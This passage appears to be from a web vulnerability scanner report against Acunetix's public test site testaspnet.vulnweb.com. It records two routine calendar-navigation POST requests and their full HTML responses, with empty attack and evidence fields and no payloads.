Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8227&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAWUzQYtoIZGRkpIiBDS3U2jYlG1%2FrWFSGHXVg3Ts%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKUwKjwCgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8uiLNbe91%2FOJ0uzQI8o%2FpKTME9Lw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:20:55 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAWUzQYtoIZGRkpIiBDS3U2jYlG1/rWFSGHXVg3Ts=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKUwKjwCgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8uiLNbe91/OJ0uzQI8o/pKTME9Lw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:White" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8587&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgCAD%2FGzfdsIZGRkuFLjAevVEEgOJTqJQoFbhcpLU6M%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKv1%2BHdCAKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCofLpjQYZOM5%2FpXJvtDbUPTtLEsG
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:28:38 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgCAD/GzfdsIZGRkuFLjAevVEEgOJTqJQoFbhcpLU6M=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKv1+HdCAKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCofLpjQYZOM5/pXJvtDbUPTtLEsG" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:White" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using 